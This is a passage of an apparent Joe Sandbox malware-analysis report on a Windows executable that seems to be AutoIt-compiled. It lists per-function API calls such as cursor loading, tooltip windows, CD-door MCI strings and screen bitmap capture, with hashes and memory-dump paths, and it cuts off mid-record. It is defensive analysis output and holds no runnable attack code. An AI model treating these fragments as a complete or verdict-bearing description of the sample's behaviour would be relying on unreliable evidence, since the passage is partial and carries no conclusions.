                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                    • String ID: @$ThumbnailClass
                                    • API String ID: 1788623398-1539354611
                                    • Opcode ID: ed219274d058c2101c6f60507acd1c75f3acdfd2e55aaa0626420c5ab4b96990
                                    • Instruction ID: 7eff77c6b8a1e5d7aa26d448c356ed7ffdc5a7e752c0b9976367d97aaaeee118
                                    • Opcode Fuzzy Hash: ed219274d058c2101c6f60507acd1c75f3acdfd2e55aaa0626420c5ab4b96990
                                    • Instruction Fuzzy Hash: D6819E71108209DFDB15DF14C881BAABBE8FF44714F14866AFD85CA296DB30DE49CB62
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: __wcsnicmp
                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                    • API String ID: 1038674560-1810252412
                                    • Opcode ID: 9d9328660f2548bb570bd0a868e80d006741c735847fbad62b782d19c997eef7
                                    • Instruction ID: 904f8a728d73d73c607da2f945c296b8c170bfd2b7a9b01d1a732f92a0dd5589
                                    • Opcode Fuzzy Hash: 9d9328660f2548bb570bd0a868e80d006741c735847fbad62b782d19c997eef7
                                    • Instruction Fuzzy Hash: 31319271548209A7DA24FA98DE03EAEB7A4FB10724F700526F441F15D1EB51AF04DA53
                                    APIs
                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 008F5013
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 008F501E
                                    • LoadCursorW.USER32(00000000,00007F03), ref: 008F5029
                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 008F5034
                                    • LoadCursorW.USER32(00000000,00007F01), ref: 008F503F
                                    • LoadCursorW.USER32(00000000,00007F81), ref: 008F504A
                                    • LoadCursorW.USER32(00000000,00007F88), ref: 008F5055
                                    • LoadCursorW.USER32(00000000,00007F80), ref: 008F5060
                                    • LoadCursorW.USER32(00000000,00007F86), ref: 008F506B
                                    • LoadCursorW.USER32(00000000,00007F83), ref: 008F5076
                                    • LoadCursorW.USER32(00000000,00007F85), ref: 008F5081
                                    • LoadCursorW.USER32(00000000,00007F82), ref: 008F508C
                                    • LoadCursorW.USER32(00000000,00007F84), ref: 008F5097
                                    • LoadCursorW.USER32(00000000,00007F04), ref: 008F50A2
                                    • LoadCursorW.USER32(00000000,00007F02), ref: 008F50AD
                                    • LoadCursorW.USER32(00000000,00007F89), ref: 008F50B8
                                    • GetCursorInfo.USER32(?), ref: 008F50C8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Cursor$Load$Info
                                    • String ID:
                                    • API String ID: 2577412497-0
                                    • Opcode ID: c06f23f4bb1283ad98d6300956c72d2c8bc9250ab19f009ae8d31c26e4e81b9d
                                    • Instruction ID: 69db20e77a00e4baaea8fae246bb8f752ee91303f7051353fbc124f1068886de
                                    • Opcode Fuzzy Hash: c06f23f4bb1283ad98d6300956c72d2c8bc9250ab19f009ae8d31c26e4e81b9d
                                    • Instruction Fuzzy Hash: D831F2B1D4871E6ADF109FB68C8996EBFE8FF04754F50453AE60DE7280DA78A5008F91
                                    APIs
                                    • _memset.LIBCMT ref: 0090A259
                                    • DestroyWindow.USER32(?,?), ref: 0090A2D3
                                      • Part of subcall function 00887BCC: _memmove.LIBCMT ref: 00887C06
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0090A34D
                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0090A36F
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0090A382
                                    • DestroyWindow.USER32(00000000), ref: 0090A3A4
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00880000,00000000), ref: 0090A3DB
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0090A3F4
                                    • GetDesktopWindow.USER32 ref: 0090A40D
                                    • GetWindowRect.USER32(00000000), ref: 0090A414
                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0090A42C
                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0090A444
                                      • Part of subcall function 008825DB: GetWindowLongW.USER32(?,000000EB), ref: 008825EC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                    • String ID: 0$tooltips_class32
                                    • API String ID: 1297703922-3619404913
                                    • Opcode ID: e4ff21166e15ad14e11c0dc7a2a62c767ee4c650eae9c39608ce1c41f27b12da
                                    • Instruction ID: ed553b17ff516f2310aca8e462fc591c2b35133363f133818cb6eac0d96b6786
                                    • Opcode Fuzzy Hash: e4ff21166e15ad14e11c0dc7a2a62c767ee4c650eae9c39608ce1c41f27b12da
                                    • Instruction Fuzzy Hash: 8D716675154304AFD721CF28C849F6A7BEAFB89704F04492DF9858B2B1DB71E902DB92
                                    APIs
                                    • CharUpperBuffW.USER32(?,?), ref: 00904424
                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0090446F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: BuffCharMessageSendUpper
                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                    • API String ID: 3974292440-4258414348
                                    • Opcode ID: 54a005404d756aa8510a261d4e6d0903d9bb76abb6382207ac4761ff5dbdf100
                                    • Instruction ID: da16d2b2d47c295dde32e9b7c8e33aa715981e1edd864cfcd822ed6a8aa6f629
                                    • Opcode Fuzzy Hash: 54a005404d756aa8510a261d4e6d0903d9bb76abb6382207ac4761ff5dbdf100
                                    • Instruction Fuzzy Hash: A8918C702043119FCB14EF18C851A6EB7E5FF95354F088868F8969B7A2DB35ED49CB82
                                    APIs
                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0090B8B4
                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00906B11,?), ref: 0090B910
                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0090B949
                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0090B98C
                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0090B9C3
                                    • FreeLibrary.KERNEL32(?), ref: 0090B9CF
                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0090B9DF
                                    • DestroyCursor.USER32(?), ref: 0090B9EE
                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0090BA0B
                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0090BA17
                                      • Part of subcall function 008A2EFD: __wcsicmp_l.LIBCMT ref: 008A2F86
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                    • String ID: .dll$.exe$.icl
                                    • API String ID: 3907162815-1154884017
                                    • Opcode ID: 26e8963aa014cea074f54fc8b61b4acf42838fb41036e216b29748bf4c14b7cc
                                    • Instruction ID: de2b61adf5d8cd86d6df9671f02228f5f574c7963f9d6ebeea392a3afec247b9
                                    • Opcode Fuzzy Hash: 26e8963aa014cea074f54fc8b61b4acf42838fb41036e216b29748bf4c14b7cc
                                    • Instruction Fuzzy Hash: 7261BE71500219BEEB24DF68CC41FBE77ACFB08724F104515F925D61D1DBB4AA90DBA0
                                    APIs
                                    • GetLocalTime.KERNEL32(?), ref: 008EDCDC
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 008EDCEC
                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008EDCF8
                                    • __wsplitpath.LIBCMT ref: 008EDD56
                                    • _wcscat.LIBCMT ref: 008EDD6E
                                    • _wcscat.LIBCMT ref: 008EDD80
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008EDD95
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 008EDDA9
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 008EDDDB
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 008EDDFC
                                    • _wcscpy.LIBCMT ref: 008EDE08
                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 008EDE47
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                    • String ID: *.*
                                    • API String ID: 3566783562-438819550
                                    • Opcode ID: 275677a83da3a23bfba990bc932fdc36fc786e0866e5a01de68e6ccf0b59b607
                                    • Instruction ID: ae966e7937258b83f8a71affba0437d20981f63dea7ef4442616068ed74b6bd5
                                    • Opcode Fuzzy Hash: 275677a83da3a23bfba990bc932fdc36fc786e0866e5a01de68e6ccf0b59b607
                                    • Instruction Fuzzy Hash: E9615B765043469FCB10EF69C8449AEB3E8FF8A314F04492DF999C7251DB31EA49CB92
                                    APIs
                                      • Part of subcall function 00889837: __itow.LIBCMT ref: 00889862
                                      • Part of subcall function 00889837: __swprintf.LIBCMT ref: 008898AC
                                    • CharLowerBuffW.USER32(?,?), ref: 008EA3CB
                                    • GetDriveTypeW.KERNEL32 ref: 008EA418
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008EA460
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008EA497
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008EA4C5
                                      • Part of subcall function 00887BCC: _memmove.LIBCMT ref: 00887C06
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                    • API String ID: 2698844021-4113822522
                                    • Opcode ID: f750f1f80b4792af8ddac14c7f6c7d0ccd64407f5686e44fb08d346dc59b9aec
                                    • Instruction ID: 296da313601b60c31e1dd293bf2026c79826bbd7f39af9a8daff849be111b8f9
                                    • Opcode Fuzzy Hash: f750f1f80b4792af8ddac14c7f6c7d0ccd64407f5686e44fb08d346dc59b9aec
                                    • Instruction Fuzzy Hash: 995149751083059FC704EF15C89196AB7F4FF89718F14886DF89A972A1DB31EE09CB42
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,008BE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 008DF8DF
                                    • LoadStringW.USER32(00000000,?,008BE029,00000001), ref: 008DF8E8
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                    • GetModuleHandleW.KERNEL32(00000000,00945310,?,00000FFF,?,?,008BE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 008DF90A
                                    • LoadStringW.USER32(00000000,?,008BE029,00000001), ref: 008DF90D
                                    • __swprintf.LIBCMT ref: 008DF95D
                                    • __swprintf.LIBCMT ref: 008DF96E
                                    • _wprintf.LIBCMT ref: 008DFA17
                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 008DFA2E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                    • API String ID: 984253442-2268648507
                                    • Opcode ID: c3b46ca31946a396908ab2909617fbb8baa448f8678133566b766c41439c94bf
                                    • Instruction ID: d978eee5da0b13fe4a3ed8fd024fbf464406b44eac73bde577913aca09d73278
                                    • Opcode Fuzzy Hash: c3b46ca31946a396908ab2909617fbb8baa448f8678133566b766c41439c94bf
                                    • Instruction Fuzzy Hash: 65415072804219AACB04FBE8DD56DEEB779FF14314F600065F606F2192EA316F09DB62
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                    • String ID:
                                    • API String ID: 884005220-0
                                    • Opcode ID: 047f4608bb287b2877f3e7c4fa37ceee47f5cb1862eafb70a9a9f8bb368469b1
                                    • Instruction ID: 3455ed94f9a783bbb853183d33ea0a79171ef9138d0e5816051b99f80d87370a
                                    • Opcode Fuzzy Hash: 047f4608bb287b2877f3e7c4fa37ceee47f5cb1862eafb70a9a9f8bb368469b1
                                    • Instruction Fuzzy Hash: BF610472508215EFEB289F7CD801BAA7BA8FF02320F214125E811E7391EB35D941DB63
                                    APIs
                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0090BA56
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0090BA6D
                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0090BA78
                                    • CloseHandle.KERNEL32(00000000), ref: 0090BA85
                                    • GlobalLock.KERNEL32(00000000), ref: 0090BA8E
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0090BA9D
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0090BAA6
                                    • CloseHandle.KERNEL32(00000000), ref: 0090BAAD
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0090BABE
                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00912CAC,?), ref: 0090BAD7
                                    • GlobalFree.KERNEL32(00000000), ref: 0090BAE7
                                    • GetObjectW.GDI32(?,00000018,000000FF), ref: 0090BB0B
                                    • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0090BB36
                                    • DeleteObject.GDI32(00000000), ref: 0090BB5E
                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0090BB74
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                    • String ID:
                                    • API String ID: 3840717409-0
                                    • Opcode ID: 0bc8bca8dcbcd5cb97913e64aefb7c2cd4cc9122bdf2105efcb270f0533e4b65
                                    • Instruction ID: d4407989d0e86340685c8f9ba5f7802713750e1fbb41cedd8950d611179eed0a
                                    • Opcode Fuzzy Hash: 0bc8bca8dcbcd5cb97913e64aefb7c2cd4cc9122bdf2105efcb270f0533e4b65
                                    • Instruction Fuzzy Hash: A4412775604208EFDB219F69DC98EAABBB8EB89B11F104068F905D72A0D7309E41DB60
                                    APIs
                                    • __wsplitpath.LIBCMT ref: 008EDA10
                                    • _wcscat.LIBCMT ref: 008EDA28
                                    • _wcscat.LIBCMT ref: 008EDA3A
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008EDA4F
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 008EDA63
                                    • GetFileAttributesW.KERNEL32(?), ref: 008EDA7B
                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 008EDA95
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 008EDAA7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                    • String ID: *.*
                                    • API String ID: 34673085-438819550
                                    • Opcode ID: e0cad7bf939b37232188e7e4dbe886dbd5f914efd592a860c83f89b58d0f90b5
                                    • Instruction ID: 88c42351a68394bbd75c63a999521c194a8586f432aa3555d8806dcf805737db
                                    • Opcode Fuzzy Hash: e0cad7bf939b37232188e7e4dbe886dbd5f914efd592a860c83f89b58d0f90b5
                                    • Instruction Fuzzy Hash: 8D8177715043859FCB64EF59C84496ABBE4FF8A714F18882EF889CB251E630DD49CB52
                                    APIs
                                    • GetDC.USER32(00000000), ref: 008F738F
                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 008F739B
                                    • CreateCompatibleDC.GDI32(?), ref: 008F73A7
                                    • SelectObject.GDI32(00000000,?), ref: 008F73B4
                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 008F7408
                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 008F7444
                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 008F7468
                                    • SelectObject.GDI32(00000006,?), ref: 008F7470
                                    • DeleteObject.GDI32(?), ref: 008F7479
                                    • DeleteDC.GDI32(00000006), ref: 008F7480
                                    • ReleaseDC.USER32(00000000,?), ref: 008F748B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                    • String ID: (
                                    • API String ID: 2598888154-3887548279
                                    • Opcode ID: 7db0d38ac193c25416a510608ff22cf8e0aa09f5eb22a5bfbc0d8837ce651217
                                    • Instruction ID: 51b12b633837465dfbae9bc648ab030ca5e68a306e9b5c6a544e230d94fcd20a
                                    • Opcode Fuzzy Hash: 7db0d38ac193c25416a510608ff22cf8e0aa09f5eb22a5bfbc0d8837ce651217
                                    • Instruction Fuzzy Hash: 4E513775904209EFDB24CFA8CC85EAEBBB9FF48310F14852DFA5AD7611C771A9409B50
                                    APIs
                                      • Part of subcall function 008A0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00886B0C,?,00008000), ref: 008A0973
                                      • Part of subcall function 00884750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00884743,?,?,008837AE,?), ref: 00884770
                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00886BAD
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00886CFA
                                      • Part of subcall function 0088586D: _wcscpy.LIBCMT ref: 008858A5
                                      • Part of subcall function 008A363D: _iswctype.LIBCMT ref: 008A3645
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
